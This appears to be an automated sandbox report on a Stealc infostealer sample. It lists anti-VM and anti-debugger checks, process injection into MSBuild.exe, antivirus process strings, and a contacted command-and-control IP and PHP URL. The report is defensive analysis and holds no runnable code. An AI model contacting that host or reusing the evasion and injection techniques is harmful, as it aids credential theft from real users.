Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe API coverage: 4.2 %
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_00639ABF FindFirstFileExW, 0_2_00639ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00401160 GetSystemInfo, 1_2_00401160
Source: Amcache.hve.6.dr Binary or memory string: VMware
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.6.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: Amcache.hve.6.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareP
Source: Amcache.hve.6.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: Amcache.hve.6.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_00627922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00627922
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004045C0 VirtualProtect ?,00000004,00000100,00000000 1_2_004045C0
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041C03D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_0041C03D
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_00622003 mov edi, dword ptr fs:[00000030h] 0_2_00622003
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_0063A64C mov eax, dword ptr fs:[00000030h] 0_2_0063A64C
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_00666628 mov eax, dword ptr fs:[00000030h] 0_2_00666628
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_00630F2E mov ecx, dword ptr fs:[00000030h] 0_2_00630F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00419750 mov eax, dword ptr fs:[00000030h] 1_2_00419750
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_0063CC4B GetProcessHeap, 0_2_0063CC4B
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_00627610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00627610
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_00627922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00627922
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_0062DA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0062DA73
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_00627AAF SetUnhandledExceptionFilter, 0_2_00627AAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0041AD48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041CEEA SetUnhandledExceptionFilter, 1_2_0041CEEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0041B33A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: Aew8SXjXEb.exe PID: 6032, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 2332, type: MEMORYSTR
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41E000 Jump to behavior
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42B000 Jump to behavior
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 65C000 Jump to behavior
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: EF7008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 0_2_0063C085
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: GetLocaleInfoW, 0_2_0063622B
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: EnumSystemLocalesW, 0_2_0063C372
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: EnumSystemLocalesW, 0_2_0063C327
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: EnumSystemLocalesW, 0_2_0063C40D
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_0063C498
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: GetLocaleInfoW, 0_2_0063C6EB
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_0063C814
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: GetLocaleInfoW, 0_2_0063C91A
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_0063C9E9
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: EnumSystemLocalesW, 0_2_00635D7F
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe Code function: 0_2_00627815 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00627815
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00417850 GetUserNameA, 1_2_00417850
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Stealc
Source: Yara match File source: 0.2.Aew8SXjXEb.exe.64dad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Aew8SXjXEb.exe.64dad8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Aew8SXjXEb.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 2332, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 0.2.Aew8SXjXEb.exe.64dad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Aew8SXjXEb.exe.64dad8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Aew8SXjXEb.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 2332, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1528328 Sample: Aew8SXjXEb.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 19 Suricata IDS alerts for network traffic 2->19 21 Found malware configuration 2->21 23 Antivirus / Scanner detection for submitted sample 2->23 25 7 other signatures 2->25 6 Aew8SXjXEb.exe 1 2->6         started        process3 signatures4 27 Writes to foreign memory regions 6->27 29 Allocates memory in foreign processes 6->29 31 Injects a PE file into a foreign processes 6->31 9 MSBuild.exe 13 6->9         started        12 WerFault.exe 19 16 6->12         started        process5 dnsIp6 17 62.204.41.150, 49707, 80 TNNET-ASTNNetOyMainnetworkFI United Kingdom 9->17 15 C:\ProgramData\Microsoft\...\Report.wer, Unicode 12->15 dropped file7
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
62.204.41.150
 unknown United Kingdom
30798 TNNET-ASTNNetOyMainnetworkFI true

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.214.172 true
s-part-0044.t-0009.fb-t-msedge.net 13.107.253.72 true
fp2e7a.wpc.phicdn.net 192.229.221.95 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://62.204.41.150/ true
    		unknown
    http://62.204.41.150/edd20096ecef326d.php true
      		unknown